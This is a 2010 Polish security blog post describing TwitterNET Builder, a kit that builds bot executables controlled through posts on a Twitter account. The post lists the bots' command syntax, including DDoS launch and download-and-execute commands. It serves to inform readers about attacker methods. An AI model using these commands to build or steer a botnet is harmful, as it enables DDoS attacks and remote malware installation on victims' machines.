13 maja 2010
Tak robią to komputerowi przestępcy V (sterowanie botnetem za pomocą Twittera)
czwartek, maja 13, 2010 | Autor:
\m/ojtek

Jak wiemy, komputerowi przestępcy odpowiedzialni za większość internetowych ataków, które na co dzień zagrażają internautom oraz serwerom internetowym, zazwyczaj nie zaprzątają sobie głowy tworzeniem własnych narzędzi. Okazało się bowiem, że crackerom bardziej opłaca się zakupić od innych przestępców gotowe zestawy lub skorzystać z narzędzi powszechnie dostępnych, niż własnoręcznie zajmować się żmudnym kodowaniem i testowaniem exploitów i wszelkich innych programów tworzonych z myślą o przeprowadzaniu ataków.
Okazuje się, że przestępcy chcący utworzyć własną sieć komputerów zombie zdalnie sterowanych za pomocą komend publikowanych w popularnym serwisie Twitter, również mogą skorzystać z gotowych rozwiązań. Wysłanie pojedynczego ćwierknięcia wystarczy, by wszystkie kontrolowane przez crackera boty rozpoczęły atak typu DDoS (ang. Distributed Denial of Service) na dowolnie wybraną witrynę internetową. Do stworzenia tego typu struktury, może posłużyć przykładowo odkryte niedawno przez specjalistów z firmy Sunbelt narzędzie TwitterNET Builder.
TwitterNET Builder pozwala na utworzenie złośliwego pliku wykonywalnego, który w wyniku ataku typu drive-by download (z wykorzystaniem złośliwej witryny wyposażonej w exploit pack) jest w stanie infekować komputery internautów. W wyniku infekcji, komputer staje się częścią botnetu, czekając na polecenia z centrum sterowania (ang. command and control centre), którym jest w tym wypadku... konto w serwisie Twitter. W szczegółach wygląda to następująco.
Po uruchomienie programu TwitterNET Builder wystarczy tylko wprowadzić nazwę naszego konta w serwisie Twitter, które będzie służyło do sterowania botnetem i nacisnąć przycisk Build:
Po chwili wygenerowany zostanie plik wykonywalny zdolny do infekowania internautów i uruchamiający w ich systemie operacyjnym program oczekujący i wykonujący polecenia publikowane w ramach wcześniej wprowadzonego profilu w serwisie Twitter.
Po chwili wygenerowany zostanie plik wykonywalny zdolny do infekowania internautów i uruchamiający w ich systemie operacyjnym program oczekujący i wykonujący polecenia publikowane w ramach wcześniej wprowadzonego profilu w serwisie Twitter.
Tak wygląda przykładowo polecenie odwiedzenia strony Google.com (1 oznacza otwarcie okna przeglądarki, 0 oznacza wykonanie wizyty niewidocznej dla użytkownika zarażonego komputera):
Pozostały komendy wyglądają następująco:
Pozostały komendy wyglądają następująco:
- .DDOS*IP*PORT (rozpoczęcie ataku DDOS),
- .SAY* (komunikat głosowy utworzony za pomocą syntezatora mowy, świetna metoda na wprawienie w osłupienie użytkownika zarażonego komputera),
- .DOWNLOAD*link.com/file.exe* (pobranie pliku, dodanie przełącznika 1 powoduje dodatkowo jego wykonanie po pobraniu).
- .STOP (wstrzymanie wszystkich aktualnych działań wykonywanych przez wszystkie boty).
- .REMOVEALL (usunięcie kanału komunikacyjnego pomiędzy kontem w Twietterze a botami).
Oto przykład otwarcie witryny Youtube wraz z zarejestrowanym (za pomocą programu Wireshark) uprzednio komunikatem odebranym z serwisu Twitter:
TwitterNET Builder jest więc niezwykle prosty w użyciu, co stanowi o jego atrakcyjności jako platformy zdolnej do szybkiego utworzenia botnetu zdolnego do przeprowadzenia ataku typu DDOS. Warto jednak mieć na uwadze, że osoby korzystające z tego typu gotowych i znanych narzędzi mogą zostać w bardzo prosty sposób namierzone... szczególnie gdy ich profil wykorzystywany do sterowania botnetem zawiera ich dane personalne.
[źródło]
Tak robią to komputerowi przestępcy V (sterowanie botnetem za pomocą Twittera)
2010-05-13T20:21:00+02:00
\m/ojtek
Bezpieczeństwo sieci komputerowych|Bezpieczeństwo systemów operacyjnych|Etyczny hacking|Narzędzia|Obrona - Atak|
Subskrybuj:
Komentarze do posta (Atom)
Wyszukaj w HCSL:
Subskrybuj:
Najpopularniejsze artykuły wszech czasów:
- Urządzenia do kopiowania kart płatniczych
- Co tak naprawdę ujawniasz w Internecie?
- Dlaczego należy zasłaniać klawiaturę bankomatu?
- Publiczna wiadomość z ukrytym przekazem
- Przyszłość antywirusów jest jasna
- Sposób na obejście internetowych blokad
- Superbezpieczne hasła na... żółtej karteczce
- Funkcje sprzętowego kasowania danych w HDD!
- 12-latek odkrył krytyczną lukę w Firefoksie
- Przestępstwo nie popłaca
- Czy jesteśmy inwigilowani przez chiński sprzęt?
- Gotowy zestaw do podsłuchiwania GSM
- Jak działa internetowa mafia?
- Uwaga na nowy rodzaj ataków phishingowych!
- Microsoftowy poradnik dla organów ścigania!
- Polski super-bezpieczny system Qubes OS
- Dane wieczyście dostępne
- Pierwszy atak samochodowych crackerów
- Pliki PDF zdolne do wykonania dowolnego kodu
- Polskie służby współpracują z firmą Google?
- Więzienie za odmowę ujawnienia hasła
- Podrzucanie dziecięcej pornografii
- Zapomniany film o hakerach
- Łamanie haseł w Windows Vista i 7